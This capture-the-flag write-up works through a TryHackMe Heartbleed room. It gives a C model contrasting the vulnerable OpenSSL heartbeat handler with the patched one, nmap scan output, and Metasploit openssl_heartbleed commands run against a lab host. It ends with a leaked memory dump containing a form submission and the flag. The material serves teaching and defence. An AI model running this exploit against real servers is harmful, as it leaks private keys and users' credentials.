25 Nov 2025
Learn to detect and exploit the Heartbleed vulnerability (CVE-2014-0160) in this hands-on TryHackMe room, and pick up some OpenSSL security and ethical hacking techniques along the way.

On the internet today, most web servers are configured to use SSL/TLS. SSL (Secure Sockets Layer) is the predecessor of TLS (Transport Layer Security). The most common versions are TLS 1.2 and TLS 1.3 (the newest, published in 2018). Configuring a web server to use TLS means that all communication between that server and a client is encrypted and integrity-protected: a malicious third party with access to the traffic can neither read it nor modify it without being detected. To learn more about how TLS connections are established, check out the handshake descriptions for 1.2 and 1.3.
Heartbleed is a bug in the OpenSSL library's implementation of the TLS heartbeat extension, present from version 1.0.1 through 1.0.1f (a range that was very widely deployed). It allows a client to read memory on the server that it would normally have no access to. That, in turn, exposes information that the encryption and integrity of TLS are supposed to protect, including:
Server private key
Confidential data like usernames, passwords, and other personal information
The implementation error is in the heartbeat message that OpenSSL uses to keep a connection alive even when no application data is flowing. A mechanism like this matters because if a connection were dropped or reset often, setting up the TLS session again each time would be expensive; that adds latency across the internet and makes services feel slow for users. A heartbeat message sent by one end of the connection contains some arbitrary data together with that data's length, and the receiving end echoes exactly that data back. When the server receives such a message from a client, here is what it does:
The server sets a pointer (memory location) to the heartbeat record
It then copies the length field sent by the user into a variable (called payload)
This length is never checked against the amount of data actually received
The server then allocates memory of the size:
1 + 2 + payload + padding (at most 1 + 2 + 65535 + 16 bytes)
The server then creates another pointer (bp) to write into this memory
The server then copies payload bytes, starting from the user's data, to bp
The server sends the data that bp points to back to the user.
So the user controls the claimed length of the data they send, independently of how much data they really send. If the claimed length is larger than the payload actually supplied (in the extreme, a 65535-byte claim with no payload at all), the server copies that many bytes starting from wherever the record sits in memory, runs past the end of the record into adjacent heap memory, and sends all of it back; that is how a client can read secrets off the server. Because the heap changes between requests, repeated heartbeats return different memory each time.
To ensure that arbitrary server memory isn't copied and sent to a user, the server needs to check the length of the heartbeat message against what actually arrived:
The server needs to check that the heartbeat record isn't 0 bytes long, or otherwise too short to hold the type byte, the two-byte length field and the padding, and silently discard it if it is
The server needs to check that the claimed payload length (plus that header and padding) doesn't exceed the length of the record it actually received
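To make the two lists above concrete, here is a small C model of the handler, added for this write-up and not taken from OpenSSL or from the room: it keeps the 1.0.1f logic next to the 1.0.1g bounds checks and runs both against a constructed heap arena in which a fake form submission (a made-up secret, not data from the target) sits directly behind the heartbeat record. The arena, the secret string and the function names are assumptions of the model; the two checks themselves mirror the ones the OpenSSL patch added.

```c
#include <stdint.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>

#define TLS1_HB_REQUEST  1
#define TLS1_HB_RESPONSE 2
#define HB_PADDING       16      /* OpenSSL pads every heartbeat with 16 random bytes */
#define ARENA_SIZE       256

/* Constructed heap model: the received record sits at arena[0]; whatever
 * happens to be next in memory (here, a planted form submission) follows it. */
static unsigned char arena[ARENA_SIZE];
static const char secret[] = "user_name=alice&user_password=hunter2"; /* constructed */

/* Write a heartbeat request whose 2-byte length field claims claimed_len
 * payload bytes while only actual_len bytes are really supplied, then plant
 * the secret right after the record. Returns the record length the TLS
 * record layer would report, or 0 if the sizes do not fit the model. */
size_t build_record(uint16_t claimed_len, size_t actual_len) {
    size_t rec_len = 1 + 2 + actual_len + HB_PADDING;
    if (rec_len + sizeof secret > ARENA_SIZE || (size_t)claimed_len + 3 > ARENA_SIZE)
        return 0;                       /* keep the modelled over-read inside the arena */
    memset(arena, 0, sizeof arena);
    arena[0] = TLS1_HB_REQUEST;
    arena[1] = (unsigned char)(claimed_len >> 8);
    arena[2] = (unsigned char)(claimed_len & 0xff);
    memset(arena + 3, 'A', actual_len); /* the payload the client really sent */
    memcpy(arena + rec_len, secret, sizeof secret);
    return rec_len;
}

/* Shared tail of both handlers: allocate 1 + 2 + payload + padding, copy
 * payload bytes from p, then pad (zeros here; OpenSSL uses random bytes). */
static int build_response(const unsigned char *p, unsigned int payload,
                          unsigned char **out) {
    unsigned char *buf = malloc(1 + 2 + payload + HB_PADDING);
    unsigned char *bp = buf;
    if (!buf) return -1;
    *bp++ = TLS1_HB_RESPONSE;
    *bp++ = (unsigned char)(payload >> 8);
    *bp++ = (unsigned char)(payload & 0xff);
    memcpy(bp, p, payload);             /* copies payload bytes, whatever they are */
    memset(bp + payload, 0, HB_PADDING);
    *out = buf;
    return (int)(3 + payload + HB_PADDING);
}

/* The 1.0.1f logic: the record length is never consulted, so the claimed
 * payload length alone decides how much memory is copied back. */
int heartbeat_vulnerable(const unsigned char *rec, unsigned char **out) {
    const unsigned char *p = rec;
    unsigned int payload;
    if (*p++ != TLS1_HB_REQUEST) return -1;
    payload = ((unsigned int)p[0] << 8) | p[1];   /* n2s(p, payload) */
    p += 2;
    return build_response(p, payload, out);
}

/* The 1.0.1g logic: two bounds checks against the real record length. */
int heartbeat_fixed(const unsigned char *rec, size_t rec_len, unsigned char **out) {
    const unsigned char *p = rec;
    unsigned int payload;
    if (1 + 2 + HB_PADDING > rec_len) return -1;            /* too short: discard */
    if (*p++ != TLS1_HB_REQUEST) return -1;
    payload = ((unsigned int)p[0] << 8) | p[1];
    p += 2;
    if (1 + 2 + payload + HB_PADDING > rec_len) return -1;  /* claim exceeds what arrived */
    return build_response(p, payload, out);
}

/* Did the planted secret come back in the response? */
int response_leaks_secret(const unsigned char *resp, int resp_len) {
    size_t n = strlen(secret);
    for (int i = 0; i + (int)n <= resp_len; i++)
        if (memcmp(resp + i, secret, n) == 0) return 1;
    return 0;
}

int main(void) {
    unsigned char *resp;
    size_t rec_len = build_record(64, 4);       /* claims 64 bytes, sends 4 */
    int n = heartbeat_vulnerable(arena, &resp);
    printf("1.0.1f: %d-byte response, secret leaked: %s\n", n,
           response_leaks_secret(resp, n) ? "yes" : "no");
    free(resp);
    n = heartbeat_fixed(arena, rec_len, &resp);
    printf("1.0.1g: %s\n", n < 0 ? "request discarded" : "answered");
    rec_len = build_record(4, 4);               /* honest request */
    n = heartbeat_fixed(arena, rec_len, &resp);
    printf("1.0.1g, honest request: %d bytes, secret leaked: %s\n", n,
           response_leaks_secret(resp, n) ? "yes" : "no");
    free(resp);
    return 0;
}
```

The model keeps the over-read inside its own arena so it is well defined; on a real server the same memcpy walks into neighbouring heap allocations, which is why the Metasploit dump later in this post contains fragments of other clients' HTTP requests rather than anything tied to the heartbeat itself.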
I started with a rustscan port sweep, handing the open ports to nmap for service and default-script detection:
┌──(hacker㉿hacker)-[/opt/ctf/heartbleed]
└─$ sudo rustscan -a 10.82.111.114 -- -sCV -oN nmap.txt
# Nmap 7.95 scan initiated Tue Nov 25 11:42:05 2025 as: /usr/lib/nmap/nmap -vvv -p 22,111,443,48305 -4 -sCV -oN nmap.txt 10.82.111.114
Nmap scan report for 10.82.111.114
Host is up, received echo-reply ttl 253 (0.15s latency).
Scanned at 2025-11-25 11:42:05 IST for 21s
PORT STATE SERVICE REASON VERSION
22/tcp open ssh syn-ack ttl 253 OpenSSH 7.4 (protocol 2.0)
| ssh-hostkey:
| 2048 ae:1e:45:53:00:47:cb:b6:31:22:f2:65:c0:bb:15:30 (RSA)
| ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQDq8crdRZdcnDxYjYbJVpC6d7BjkRIsUhK5tZt1Zt95WCfcVAj1E0D+bK/JcOcbch1ZVjKHd554KICIdXT+uHkg7mbU7tRKlFZftgLaWrmCHkfg1dA+FwisdEzDoEQX8nA1Q7YaZO+2/Akg0hQ7KxzWrIyhK3rq8NLVkpdZFmRDPhfoaQj3GG8zcjCBXlJ/8BnVtFlDu07DghEag4npbHTLvlzzmwOEnPUmlsXRVk9vMUaXCYrYQ0Rm/t/8tJp3Ti9GqTClrmzW/rex1Cp6rSLmMV6iJ+WR2vFrmAqvSv2cjxDnF297iSJhGm8TljaShoWgNtfMqWzniXpOLiEyuox3
| 256 c4:95:98:9c:ca:af:f4:5e:c3:a3:32:46:75:fc:f3:0c (ECDSA)
| ecdsa-sha2-nistp256 AAAAE2VjZHNhLXNoYTItbmlzdHAyNTYAAAAIbmlzdHAyNTYAAABBBMueUWGbdlBeuP5Zo3TjIOopOKh+LnEXYNVUy3OoJUQ81bMKY3+g8809bG42XhUvc5aJG/BYN83u2RWovDMJxG4=
| 256 59:23:ee:39:aa:01:81:54:cd:ea:27:c6:38:a9:ef:88 (ED25519)
|_ssh-ed25519 AAAAC3NzaC1lZDI1NTE5AAAAIDubcRk+23FYQ5Iz3G1ho2VUGn/9nBexWdtbMzu5ErMP
111/tcp open rpcbind syn-ack ttl 253 2-4 (RPC #100000)
| rpcinfo:
| program version port/proto service
| 100000 2,3,4 111/tcp rpcbind
| 100000 2,3,4 111/udp rpcbind
| 100000 3,4 111/tcp6 rpcbind
| 100000 3,4 111/udp6 rpcbind
| 100024 1 48305/tcp status
| 100024 1 50893/tcp6 status
| 100024 1 56651/udp6 status
|_ 100024 1 60404/udp status
443/tcp open ssl/http syn-ack ttl 253 nginx 1.15.7
|_http-server-header: nginx/1.15.7
|_ssl-date: TLS randomness does not represent time
| tls-nextprotoneg:
|_ http/1.1
| http-methods:
|_ Supported Methods: GET HEAD
| ssl-cert: Subject: commonName=localhost/organizationName=TryHackMe/stateOrProvinceName=London/countryName=UK/organizationalUnitName=TryHackMe/localityName=London
| Issuer: commonName=localhost/organizationName=TryHackMe/stateOrProvinceName=London/countryName=UK/organizationalUnitName=TryHackMe/localityName=London
| Public Key type: rsa
| Public Key bits: 2048
| Signature Algorithm: sha256WithRSAEncryption
| Not valid before: 2019-02-16T10:41:14
| Not valid after: 2020-02-16T10:41:14
| MD5: 4b3a:f45e:a597:6f3f:06f6:e9d2:518a:c1c4
| SHA-1: 01e8:fa58:e5a0:5102:d9e3:2ee3:8212:9d28:3934:4d57
| -----BEGIN CERTIFICATE-----
| MIIDqTCCApGgAwIBAgIJANbrflfhzmNCMA0GCSqGSIb3DQEBCwUAMGsxCzAJBgNV
| BAYTAlVLMQ8wDQYDVQQIDAZMb25kb24xDzANBgNVBAcMBkxvbmRvbjESMBAGA1UE
| CgwJVHJ5SGFja01lMRIwEAYDVQQLDAlUcnlIYWNrTWUxEjAQBgNVBAMMCWxvY2Fs
| aG9zdDAeFw0xOTAyMTYxMDQxMTRaFw0yMDAyMTYxMDQxMTRaMGsxCzAJBgNVBAYT
| AlVLMQ8wDQYDVQQIDAZMb25kb24xDzANBgNVBAcMBkxvbmRvbjESMBAGA1UECgwJ
| VHJ5SGFja01lMRIwEAYDVQQLDAlUcnlIYWNrTWUxEjAQBgNVBAMMCWxvY2FsaG9z
| dDCCASIwDQYJKoZIhvcNAQEBBQADggEPADCCAQoCggEBAKNPQRA9EuSt88yrnnbi
| 0GxKE2L9E5cR0VocQNqXEyjKcGgAMgngP+4FtCc3+SkZ3MBoHcSk7NfcZtG7asYO
| 8uhcWYe8OjrGQxayAvu3+Et+93IhiTfAj2J+rPZ39vH0/BrHFx8jVty5buV65/Sp
| gIvPLoOTJMoSbITIRAuWbz6dUkrwplY54BPoCisG7OF6LUEFw5Mk2AvbGz3cViW2
| Aoh+/LoU7/b4PY3MUMXMaJ+BP+no381UgsWY3Z25vQ0FDhoAIu1UGP9UwzPYhi67
| giuaYxTcJ+C+RQClFCEh/CWOhAlFpiv5jPoMb+MydSqfNYGbZnVCUOtyOrzddqVz
| UFkCAwEAAaNQME4wHQYDVR0OBBYEFJSFOFjOlnq586iW1lKHV2Ra3PMtMB8GA1Ud
| IwQYMBaAFJSFOFjOlnq586iW1lKHV2Ra3PMtMAwGA1UdEwQFMAMBAf8wDQYJKoZI
| hvcNAQELBQADggEBAKDbHJdeVUnCqHH1bgffyqH6sgUixnj3yDB35mvQkrZcopoT
| VQeHF9EudJJn4zSWRDwqbdJceQiBC13TTanYcWVIklMSVdVOXm0ELPJ8JaoUTCIo
| SfmiS5Brs5YT8pkxh/AmTclQ/nw2wfVmywHqJEHkjr/PuucPclqJ6VpmZ31bNOv1
| 3zPIXZ2FSRh5sl/t6XzhsiRQlhicowh7lOfRV+BaDvGOmYl5L6ip/7rgvlpE8Y4G
| yGsScGFxEz5SgJPQmYOYGxsb6Hwp2ZGFxLLUYLP6wwyegeyU8tHH5G7NR7F+55Xs
| 3eItjr429tcrE7aDJDlmkF8iLix+LBigl6b0wEM=
|_-----END CERTIFICATE-----
|_http-title: What are you looking for?
48305/tcp open status syn-ack ttl 253 1 (RPC #100024)
Read data files from: /usr/share/nmap
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
# Nmap done at Tue Nov 25 11:42:26 2025 -- 1 IP address (1 host up) scanned in 20.82 seconds
I then ran the NSE vuln scripts against the open ports:
# Nmap 7.95 scan initiated Tue Nov 25 11:45:35 2025 as: /usr/lib/nmap/nmap -p22,111,443 --script vuln -oN scirpScan.txt -vv 10.82.111.114
Nmap scan report for 10.82.111.114
Host is up, received reset ttl 253 (0.15s latency).
Scanned at 2025-11-25 11:45:45 IST for 692s
PORT STATE SERVICE REASON
22/tcp open ssh syn-ack ttl 253
111/tcp open rpcbind syn-ack ttl 253
443/tcp open https syn-ack ttl 253
|_http-litespeed-sourcecode-download: Request with null byte did not work. This web server might not be vulnerable
| ssl-ccs-injection:
| VULNERABLE:
| SSL/TLS MITM vulnerability (CCS Injection)
| State: VULNERABLE
| Risk factor: High
| OpenSSL before 0.9.8za, 1.0.0 before 1.0.0m, and 1.0.1 before 1.0.1h
| does not properly restrict processing of ChangeCipherSpec messages,
| which allows man-in-the-middle attackers to trigger use of a zero
| length master key in certain OpenSSL-to-OpenSSL communications, and
| consequently hijack sessions or obtain sensitive information, via
| a crafted TLS handshake, aka the "CCS Injection" vulnerability.
|
| References:
| http://www.openssl.org/news/secadv_20140605.txt
| http://www.cvedetails.com/cve/2014-0224
|_ https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-0224
|_http-stored-xss: Couldn't find any stored XSS vulnerabilities.
|_http-jsonp-detection: Couldn't find any JSONP endpoints.
|_http-wordpress-users: [Error] Wordpress installation was not found. We couldn't find wp-login.php
|_http-dombased-xss: Couldn't find any DOM based XSS.
| http-vuln-cve2011-3192:
| VULNERABLE:
| Apache byterange filter DoS
| State: VULNERABLE
| IDs: BID:49303 CVE:CVE-2011-3192
| The Apache web server is vulnerable to a denial of service attack when numerous
| overlapping byte ranges are requested.
| Disclosure date: 2011-08-19
| References:
| https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2011-3192
| https://seclists.org/fulldisclosure/2011/Aug/175
| https://www.securityfocus.com/bid/49303
|_ https://www.tenable.com/plugins/nessus/55976
| ssl-heartbleed:
| VULNERABLE:
| The Heartbleed Bug is a serious vulnerability in the popular OpenSSL cryptographic software library. It allows for stealing information intended to be protected by SSL/TLS encryption.
| State: VULNERABLE
| Risk factor: High
| OpenSSL versions 1.0.1 and 1.0.2-beta releases (including 1.0.1f and 1.0.2-beta1) of OpenSSL are affected by the Heartbleed bug. The bug allows for reading memory of systems protected by the vulnerable OpenSSL versions and could allow for disclosure of otherwise encrypted confidential information as well as the encryption keys themselves.
|
| References:
| http://www.openssl.org/news/secadv_20140407.txt
| https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-0160
|_ http://cvedetails.com/cve/2014-0160/
|_http-csrf: Couldn't find any CSRF vulnerabilities.
Read data files from: /usr/share/nmap
# Nmap done at Tue Nov 25 11:57:17 2025 -- 1 IP address (1 host up) scanned in 701.95 seconds
The ssl-heartbleed script reports the host as vulnerable to Heartbleed (CVE-2014-0160). The same scan also flags CCS Injection (CVE-2014-0224), which fits an OpenSSL 1.0.1 build older than 1.0.1h; the Apache byterange DoS result is worth treating with suspicion, since the service scan identified the web server as nginx. With Heartbleed confirmed, I went straight to Metasploit and searched for heartbleed, which turned up a matching module:
msf > search heartbleed
Matching Modules
================
# Name Disclosure Date Rank Check Description
- ---- --------------- ---- ----- -----------
0 auxiliary/scanner/http/elasticsearch_memory_disclosure 2021-07-21 normal Yes Elasticsearch Memory Disclosure
1 \_ action: DUMP . . . Dump memory contents to loot
2 \_ action: SCAN . . . Check hosts for vulnerability
3 auxiliary/server/openssl_heartbeat_client_memory 2014-04-07 normal No OpenSSL Heartbeat (Heartbleed) Client Memory Exposure
4 auxiliary/scanner/ssl/openssl_heartbleed 2014-04-07 normal Yes OpenSSL Heartbeat (Heartbleed) Information Leak
5 \_ action: DUMP . . . Dump memory contents to loot
6 \_ action: KEYS . . . Recover private keys from memory
7 \_ action: SCAN . . . Check hosts for vulnerability
Interact with a module by name or index. For example info 7, use 7 or use auxiliary/scanner/ssl/openssl_heartbleed
After interacting with a module you can manually set a ACTION with set ACTION 'SCAN'
msf auxiliary(scanner/ssl/openssl_heartbleed) > set rhosts 10.82.111.114
rhosts => 10.82.111.114
msf auxiliary(scanner/ssl/openssl_heartbleed) > set action DUMP
action => DUMP
msf auxiliary(scanner/ssl/openssl_heartbleed) > run
[+] 10.82.111.114:443 - Heartbeat response with leak, 41635 bytes
[+] 10.82.111.114:443 - Heartbeat data stored in /root/.msf4/loot/20251125120516_default_10.82.111.114_openssl.heartble_427312.bin
[*] 10.82.111.114:443 - Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed
The module stores the leaked memory as loot in /root/.msf4/loot/20251125120516_default_10.82.111.114_openssl.heartble_427312.bin.
I cat'd that file (it is raw binary, so strings or grep -a would be the tidier way to pull out the readable parts) and found our flag:
┌──(root㉿hacker)-[/opt/ctf/heartbleed]
└─# cat /root/.msf4/loot/20251125120516_default_10.82.111.114_openssl.heartble_427312.bin
���i$�(;S��>A�'�Rh��]J�L�>▒$oA(��f��
�"�!98����5����
�� ��32��ED��/�A���
� �36 (KHTML, like Gecko) Chrome/44.0.2403.89 Safari/537.36
Content-Length: 75
Content-Type: application/x-www-form-urlencoded
user_name=hacker101&user_email=haxor@haxor.com&user_message=THM{sSl-Is-BaD}=74v�~`H���8��+ -3�������L�:��E!�1Z�
[...]
GET /uir//tmp/csman/0 HTTP/1.1
Host: 10.82.111.114
Connection: close
User-Agent: Mozilla/5.0 (compatible; Nmap Scripting Engine; https://nmap.org/book/nse.html)
��5����
�,r[���?�
The dump is a snapshot of the server's heap: it contains the body of an earlier POST to the site's contact form (user_name, user_email and a user_message holding the flag) and, further on, the GET request that nmap's own NSE probe sent a few minutes earlier. The flag is THM{sSl-Is-BaD}.
